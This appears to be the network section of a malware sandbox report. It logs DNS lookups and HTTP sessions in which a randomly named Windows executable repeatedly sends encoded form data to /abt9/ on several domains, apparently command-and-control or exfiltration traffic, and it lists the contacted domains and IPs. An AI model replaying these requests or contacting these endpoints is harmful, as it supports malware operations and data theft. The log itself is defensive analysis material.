                                                Jun 1, 2024 19:59:46.237772942 CEST4971880192.168.2.7193.37.145.73
                                                Jun 1, 2024 19:59:46.242618084 CEST8049718193.37.145.73192.168.2.7
Timestamp                            Source Port  Dest Port  Source IP    Dest IP
Jun 1, 2024 19:57:40.946175098 CEST  57216        53         192.168.2.7  1.1.1.1
Jun 1, 2024 19:57:41.026527882 CEST  53           57216      1.1.1.1      192.168.2.7
Jun 1, 2024 19:58:50.763636112 CEST  64901        53         192.168.2.7  1.1.1.1
Jun 1, 2024 19:58:51.417244911 CEST  53           64901      1.1.1.1      192.168.2.7
Jun 1, 2024 19:59:07.482552052 CEST  54647        53         192.168.2.7  1.1.1.1
Jun 1, 2024 19:59:07.772542000 CEST  53           54647      1.1.1.1      192.168.2.7
Jun 1, 2024 19:59:21.467605114 CEST  57635        53         192.168.2.7  1.1.1.1
Jun 1, 2024 19:59:21.477257967 CEST  53           57635      1.1.1.1      192.168.2.7
Jun 1, 2024 19:59:29.530019045 CEST  53304        53         192.168.2.7  1.1.1.1
Jun 1, 2024 19:59:29.565711021 CEST  53           53304      1.1.1.1      192.168.2.7
Jun 1, 2024 19:59:37.623279095 CEST  61029        53         192.168.2.7  1.1.1.1
Jun 1, 2024 19:59:37.696751118 CEST  53           61029      1.1.1.1      192.168.2.7
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Jun 1, 2024 19:57:40.946175098 CEST | 192.168.2.7 | 1.1.1.1 | 0x9b35 | Standard query (0) | ramirex.ro | A (IP address) | IN (0x0001) | false
Jun 1, 2024 19:58:50.763636112 CEST | 192.168.2.7 | 1.1.1.1 | 0x2d7f | Standard query (0) | www.387mfyr.sbs | A (IP address) | IN (0x0001) | false
Jun 1, 2024 19:59:07.482552052 CEST | 192.168.2.7 | 1.1.1.1 | 0x5381 | Standard query (0) | www.led-svitidla.eu | A (IP address) | IN (0x0001) | false
Jun 1, 2024 19:59:21.467605114 CEST | 192.168.2.7 | 1.1.1.1 | 0x3f69 | Standard query (0) | www.andywork.one | A (IP address) | IN (0x0001) | false
Jun 1, 2024 19:59:29.530019045 CEST | 192.168.2.7 | 1.1.1.1 | 0xd9a1 | Standard query (0) | www.slamdrops.com | A (IP address) | IN (0x0001) | false
Jun 1, 2024 19:59:37.623279095 CEST | 192.168.2.7 | 1.1.1.1 | 0x1e45 | Standard query (0) | www.beldecor.net | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Jun 1, 2024 19:57:41.026527882 CEST | 1.1.1.1 | 192.168.2.7 | 0x9b35 | No error (0) | ramirex.ro | | 188.215.50.15 | A (IP address) | IN (0x0001) | false
Jun 1, 2024 19:58:51.417244911 CEST | 1.1.1.1 | 192.168.2.7 | 0x2d7f | No error (0) | www.387mfyr.sbs | | 137.220.252.40 | A (IP address) | IN (0x0001) | false
Jun 1, 2024 19:59:07.772542000 CEST | 1.1.1.1 | 192.168.2.7 | 0x5381 | No error (0) | www.led-svitidla.eu | led-svitidla.eu | | CNAME (Canonical name) | IN (0x0001) | false
Jun 1, 2024 19:59:07.772542000 CEST | 1.1.1.1 | 192.168.2.7 | 0x5381 | No error (0) | led-svitidla.eu | | 37.235.104.9 | A (IP address) | IN (0x0001) | false
Jun 1, 2024 19:59:21.477257967 CEST | 1.1.1.1 | 192.168.2.7 | 0x3f69 | Name error (3) | www.andywork.one | none | none | A (IP address) | IN (0x0001) | false
Jun 1, 2024 19:59:29.565711021 CEST | 1.1.1.1 | 192.168.2.7 | 0xd9a1 | Name error (3) | www.slamdrops.com | none | none | A (IP address) | IN (0x0001) | false
Jun 1, 2024 19:59:37.696751118 CEST | 1.1.1.1 | 192.168.2.7 | 0x1e45 | No error (0) | www.beldecor.net | beldecor.net | | CNAME (Canonical name) | IN (0x0001) | false
Jun 1, 2024 19:59:37.696751118 CEST | 1.1.1.1 | 192.168.2.7 | 0x1e45 | No error (0) | beldecor.net | | 193.37.145.73 | A (IP address) | IN (0x0001) | false
• ramirex.ro
• www.387mfyr.sbs
• www.led-svitidla.eu
• www.beldecor.net
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.7 | 49710 | 137.220.252.40 | 80 | 6256 | C:\Program Files (x86)\inKjrEeJPqrLFNOWzGWorIUhMdJgcKADyUVzTIeqJiwbzVgZKvLgDppI\dczsDTwoOAPdxoSvtjazysDUwNBh.exe
Timestamp | Bytes transferred | Direction | Data
Jun 1, 2024 19:58:51.430025101 CEST | 467 | OUT | GET /abt9/?Of5HNz9=nO9f1eGtjr/sKzmKQQI1Gqn0vyk6T1iYdf0G+pz4r/6P+DB2OQ61Wxj49dZSRaju4ptYBpim6kquuDHdOrdtP6hUKp5Wb66wssc3rTHo+fACwEvPa+X6vTXJYKXAx7rcdiqsO+f3J/gP&HvxX=KFLDJ HTTP/1.1
Host: www.387mfyr.sbs
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-us
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
Jun 1, 2024 19:58:52.301407099 CEST | 691 | IN | HTTP/1.1 404 Not Found
Server: nginx
Date: Sat, 01 Jun 2024 17:58:52 GMT
Content-Type: text/html
Content-Length: 548
Connection: close
                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED]
                                                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.7 | 49711 | 37.235.104.9 | 80 | 6256 | C:\Program Files (x86)\inKjrEeJPqrLFNOWzGWorIUhMdJgcKADyUVzTIeqJiwbzVgZKvLgDppI\dczsDTwoOAPdxoSvtjazysDUwNBh.exe
Timestamp | Bytes transferred | Direction | Data
Jun 1, 2024 19:59:07.784511089 CEST | 743 | OUT | POST /abt9/ HTTP/1.1
Host: www.led-svitidla.eu
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate, br
Accept-Language: en-us
Origin: http://www.led-svitidla.eu
Referer: http://www.led-svitidla.eu/abt9/
Cache-Control: max-age=0
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 220
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
                                                Data Raw: 4f 66 35 48 4e 7a 39 3d 76 58 56 36 65 6f 50 64 4a 34 37 52 68 72 59 53 48 71 56 6b 46 49 6a 66 6a 58 31 7a 64 41 46 31 70 63 52 76 45 5a 73 41 66 46 46 36 65 72 67 6b 49 59 71 6b 2b 2f 6a 62 38 63 63 37 69 2b 59 59 34 6a 31 42 78 4b 33 6c 6d 6d 34 4f 34 74 34 62 59 33 4a 54 4a 55 6a 4e 70 63 6a 61 2f 4e 45 69 79 4a 5a 6f 63 72 69 36 67 51 61 51 7a 6a 73 77 53 4f 39 64 42 73 74 46 6d 45 50 50 4e 75 4b 57 38 68 33 52 34 4c 4e 69 56 73 46 47 34 6b 78 62 71 58 4e 2b 34 59 45 46 70 6b 45 62 30 62 62 4f 2b 32 6e 45 4f 78 38 61 7a 37 6d 35 48 50 53 61 39 6b 38 71 70 6f 71 4c 32 4c 6b 36 77 52 4d 62 34 33 49 37 30 4d 6f 45 65 48 72 51 77 59 54 4e 51 67 3d 3d
                                                Data Ascii: Of5HNz9=vXV6eoPdJ47RhrYSHqVkFIjfjX1zdAF1pcRvEZsAfFF6ergkIYqk+/jb8cc7i+YY4j1BxK3lmm4O4t4bY3JTJUjNpcja/NEiyJZocri6gQaQzjswSO9dBstFmEPPNuKW8h3R4LNiVsFG4kxbqXN+4YEFpkEb0bbO+2nEOx8az7m5HPSa9k8qpoqL2Lk6wRMb43I70MoEeHrQwYTNQg==
Jun 1, 2024 19:59:08.636246920 CEST | 544 | IN | HTTP/1.1 404 Not Found
Date: Sat, 01 Jun 2024 17:59:08 GMT
Server: Apache
X-Content-Type-Options: nosniff
X-XSS-Protection: 1;mode=block
Content-Length: 315
Connection: close
Content-Type: text/html; charset=iso-8859-1
                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.7 | 49712 | 37.235.104.9 | 80 | 6256 | C:\Program Files (x86)\inKjrEeJPqrLFNOWzGWorIUhMdJgcKADyUVzTIeqJiwbzVgZKvLgDppI\dczsDTwoOAPdxoSvtjazysDUwNBh.exe
Timestamp | Bytes transferred | Direction | Data
Jun 1, 2024 19:59:10.316728115 CEST | 763 | OUT | POST /abt9/ HTTP/1.1
Host: www.led-svitidla.eu
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate, br
Accept-Language: en-us
Origin: http://www.led-svitidla.eu
Referer: http://www.led-svitidla.eu/abt9/
Cache-Control: max-age=0
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 240
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
                                                Data Raw: 4f 66 35 48 4e 7a 39 3d 76 58 56 36 65 6f 50 64 4a 34 37 52 37 4c 6f 53 47 4c 56 6b 48 6f 6a 63 39 6e 31 7a 4b 51 45 64 70 63 64 76 45 63 63 51 66 51 74 36 65 4f 45 6b 50 64 47 6b 72 2f 6a 62 33 38 63 2b 74 65 59 58 34 6a 78 7a 78 4c 4c 6c 6d 6d 73 4f 34 74 6f 62 59 46 68 51 50 55 6a 4c 79 73 6a 55 79 74 45 69 79 4a 5a 6f 63 72 6d 51 67 51 43 51 76 48 6f 77 64 50 39 65 66 63 74 43 77 30 50 50 4a 75 4b 53 38 68 33 6a 34 4b 52 62 56 71 5a 47 34 67 35 62 72 43 68 39 68 6f 45 44 6e 45 46 76 6b 62 44 48 35 79 6a 66 4c 43 51 50 35 4d 75 4a 43 35 50 34 6e 47 77 47 33 35 53 77 79 4a 41 4d 6e 33 52 75 36 32 4d 6a 35 75 63 6c 42 77 4f 36 39 4b 79 4a 47 5a 78 59 6e 2b 66 35 30 58 6b 53 4d 74 75 6d 67 79 71 41 43 6d 30 3d
                                                Data Ascii: Of5HNz9=vXV6eoPdJ47R7LoSGLVkHojc9n1zKQEdpcdvEccQfQt6eOEkPdGkr/jb38c+teYX4jxzxLLlmmsO4tobYFhQPUjLysjUytEiyJZocrmQgQCQvHowdP9efctCw0PPJuKS8h3j4KRbVqZG4g5brCh9hoEDnEFvkbDH5yjfLCQP5MuJC5P4nGwG35SwyJAMn3Ru62Mj5uclBwO69KyJGZxYn+f50XkSMtumgyqACm0=
Jun 1, 2024 19:59:11.168515921 CEST | 544 | IN | HTTP/1.1 404 Not Found
Date: Sat, 01 Jun 2024 17:59:11 GMT
Server: Apache
X-Content-Type-Options: nosniff
X-XSS-Protection: 1;mode=block
Content-Length: 315
Connection: close
Content-Type: text/html; charset=iso-8859-1
                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.2.7 | 49713 | 37.235.104.9 | 80 | 6256 | C:\Program Files (x86)\inKjrEeJPqrLFNOWzGWorIUhMdJgcKADyUVzTIeqJiwbzVgZKvLgDppI\dczsDTwoOAPdxoSvtjazysDUwNBh.exe
Timestamp | Bytes transferred | Direction | Data
Jun 1, 2024 19:59:12.849035978 CEST | 1776 | OUT | POST /abt9/ HTTP/1.1
Host: www.led-svitidla.eu
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate, br
Accept-Language: en-us
Origin: http://www.led-svitidla.eu
Referer: http://www.led-svitidla.eu/abt9/
Cache-Control: max-age=0
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 1252
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
                                                Data Raw: 4f 66 35 48 4e 7a 39 3d 76 58 56 36 65 6f 50 64 4a 34 37 52 37 4c 6f 53 47 4c 56 6b 48 6f 6a 63 39 6e 31 7a 4b 51 45 64 70 63 64 76 45 63 63 51 66 57 31 36 66 34 59 6b 50 36 79 6b 74 50 6a 62 36 63 63 2f 74 65 59 77 34 6a 4a 33 78 4c 47 48 6d 6b 55 4f 34 4f 51 62 61 30 68 51 61 6b 6a 4c 36 4d 6a 56 2f 4e 46 2f 79 49 6f 68 63 71 57 51 67 51 43 51 76 47 59 77 61 65 39 65 64 63 74 46 6d 45 50 49 4e 75 4b 32 38 68 2f 5a 34 4b 56 4c 55 5a 42 47 34 42 46 62 73 77 5a 39 70 6f 45 42 71 6b 46 33 6b 62 2b 66 35 7a 4c 39 4c 43 55 6c 35 4c 71 4a 42 66 61 4d 7a 6b 46 65 74 37 57 44 74 76 6b 62 6c 57 38 53 69 47 63 4f 7a 49 4d 59 43 44 48 47 6d 6f 36 6c 42 63 6b 4b 36 63 33 78 7a 33 6b 63 42 4c 48 45 78 44 43 47 42 53 50 7a 4b 38 56 68 63 4d 53 72 6f 6c 63 47 2f 74 2b 6d 42 41 6b 58 46 48 65 44 47 75 77 4b 4d 76 6c 77 51 65 78 7a 35 67 73 67 79 4d 54 45 68 30 35 6e 33 55 4a 47 4d 49 78 48 73 65 72 56 2b 33 59 48 6c 69 6b 79 4d 52 43 64 69 2b 65 78 51 64 77 75 33 49 7a 43 6c 58 47 4d 76 50 4a 4e 54 58 61 4a 2b 4a [TRUNCATED]
                                                Data Ascii: Of5HNz9=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 [TRUNCATED]
Jun 1, 2024 19:59:13.685551882 CEST | 544 | IN | HTTP/1.1 404 Not Found
Date: Sat, 01 Jun 2024 17:59:13 GMT
Server: Apache
X-Content-Type-Options: nosniff
X-XSS-Protection: 1;mode=block
Content-Length: 315
Connection: close
Content-Type: text/html; charset=iso-8859-1
                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
4 | 192.168.2.7 | 49714 | 37.235.104.9 | 80 | 6256 | C:\Program Files (x86)\inKjrEeJPqrLFNOWzGWorIUhMdJgcKADyUVzTIeqJiwbzVgZKvLgDppI\dczsDTwoOAPdxoSvtjazysDUwNBh.exe
Timestamp | Bytes transferred | Direction | Data
Jun 1, 2024 19:59:15.465473890 CEST | 471 | OUT | GET /abt9/?Of5HNz9=iV9adYjvPp7RuLwaP6BmForAyDRLfg4mpsRDBpobO1h4QpcDO6+h8uyV1/sip+su221s2KGGsEsC4t0dUTAnOg7+9cTY95M3z71wQoeHgy2DqTBwSPZzUbg36nzdDZOI6y7kx7FtYrhA&HvxX=KFLDJ HTTP/1.1
Host: www.led-svitidla.eu
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-us
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
Jun 1, 2024 19:59:16.317831993 CEST | 544 | IN | HTTP/1.1 404 Not Found
Date: Sat, 01 Jun 2024 17:59:16 GMT
Server: Apache
X-Content-Type-Options: nosniff
X-XSS-Protection: 1;mode=block
Content-Length: 315
Connection: close
Content-Type: text/html; charset=iso-8859-1
                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
5 | 192.168.2.7 | 49715 | 193.37.145.73 | 80 | 6256 | C:\Program Files (x86)\inKjrEeJPqrLFNOWzGWorIUhMdJgcKADyUVzTIeqJiwbzVgZKvLgDppI\dczsDTwoOAPdxoSvtjazysDUwNBh.exe
Timestamp | Bytes transferred | Direction | Data
Jun 1, 2024 19:59:37.706533909 CEST | 734 | OUT | POST /abt9/ HTTP/1.1
Host: www.beldecor.net
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate, br
Accept-Language: en-us
Origin: http://www.beldecor.net
Referer: http://www.beldecor.net/abt9/
Cache-Control: max-age=0
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 220
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
                                                Data Raw: 4f 66 35 48 4e 7a 39 3d 5a 38 46 7a 4b 39 2f 47 6d 69 4c 37 31 53 4d 54 56 78 2b 45 51 79 4c 54 74 45 56 74 49 4e 6e 4c 36 35 57 63 66 70 43 77 51 66 54 76 64 4d 64 58 44 64 48 73 47 36 44 57 7a 2b 74 69 30 5a 30 4e 52 51 30 56 56 58 67 31 64 54 78 69 7a 76 73 6b 51 62 72 5a 46 48 41 51 68 31 48 43 53 66 51 71 38 7a 36 5a 31 73 5a 51 46 6c 31 74 39 6a 52 4b 68 50 36 53 45 37 44 6b 48 71 72 4d 64 4b 69 4c 74 32 6a 73 69 4f 4c 67 68 73 7a 43 67 47 70 30 58 53 55 2f 4c 6d 65 4f 64 77 45 4f 37 6f 58 5a 32 49 48 53 41 6b 43 2b 68 31 6b 45 62 39 57 37 77 46 4a 33 53 39 70 37 51 6d 58 7a 32 51 4b 76 68 79 46 2b 73 4e 44 74 46 39 50 45 55 78 44 41 67 77 3d 3d
                                                Data Ascii: Of5HNz9=Z8FzK9/GmiL71SMTVx+EQyLTtEVtINnL65WcfpCwQfTvdMdXDdHsG6DWz+ti0Z0NRQ0VVXg1dTxizvskQbrZFHAQh1HCSfQq8z6Z1sZQFl1t9jRKhP6SE7DkHqrMdKiLt2jsiOLghszCgGp0XSU/LmeOdwEO7oXZ2IHSAkC+h1kEb9W7wFJ3S9p7QmXz2QKvhyF+sNDtF9PEUxDAgw==
Jun 1, 2024 19:59:38.528461933 CEST | 1046 | IN | HTTP/1.1 404 Not Found
Date: Sat, 01 Jun 2024 17:59:38 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Content-Encoding: gzip
                                                Data Raw: 33 36 62 0d 0a 1f 8b 08 00 00 00 00 00 04 03 75 54 4d 6f db 38 10 bd fb 57 4c 75 c9 c5 92 62 c7 dd 66 53 db 40 1b bb 88 81 b4 09 12 15 45 8e 14 39 b2 88 50 a4 4a 52 51 0c ec 1f ca 79 7f 42 fe d8 0e 45 3b 9b 7e 9d 64 92 f3 de 9b 79 33 e3 f9 9b d5 d5 79 71 77 bd 86 8b e2 f3 25 5c 7f fd 78 b9 39 87 24 cd f3 6f 27 e7 79 be 2a 56 f1 61 96 1d 4f f2 7c fd 25 81 a4 f6 be 3d cb f3 be ef b3 fe 24 33 76 9b 17 37 79 ed 1b 35 cb 9d b7 92 fb 4c 78 91 2c 47 f3 70 07 8a e9 ed 22 a9 ec 70 81 4c d0 7d 83 9e 41 60 49 f1 7b 27 1f 16 c9 b9 d1 1e b5 4f 8b 5d 8b 09 f0 78 5a 24 1e 1f fd 40 fc 1e 78 cd ac 43 bf e8 7c 95 9e 06 aa 81 43 b3 06 17 89 35 a5 f1 ee 15 4e 1b 8d 63 6d a4 16 f8 48 df ca 28 65 fa 17 d0 6b 61 ce 78 8d 69 10 b4 46 fd c0 90 0e 4f bf 05 b5 96 6d 1b f6 87 e8 62 53 5c ae 97 b3 e3 19 7c 31 1e 3e 99 4e 8b 79 1e 2f 47 f3 fc 62 fd 61 45 c9 7f bc 5a dd d1 e7 62 b2 7c 15 44 a7 51 51 23 58 32 05 9d 47 01 c2 f0 ae 21 5f a0 67 0e 34 d1 55 81 0e 8c 06 5f 4b 07 0e ed 03 da 6c 34 bf 0e 5c 37 07 42 0d 85 35 dd c3 f3 13 [TRUNCATED]
                                                Data Ascii: 36buTMo8WLubfS@E9PJRQyBE;~dy3yqw%\x9$o'y*VaO|%=$3v7y5Lx,Gp"pL}A`I{'O]xZ$@xC|C5NcmH(ekaxiFOmbS\|1>Ny/GbaEZb|DQQ#X2G!_g4U_Kl4\7B5%#aZ<?>bu8FWbX)&L^j(GJ8cBAv9%iJT9k\-Rwfu%odNOg_N.aM 2wyT1|g*5 }\!YJ*d42ZZL1\#:raJ%cp-rYIN])$*Ln e]H{VwND!2Pq)&D{hJr>VtpIE niT^eu5ED+)E?0e6Pn[vfmc37UxF#&75H)Tm38,2ahT&P1-)]-FjtQqh-;Qlz+#E=!0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
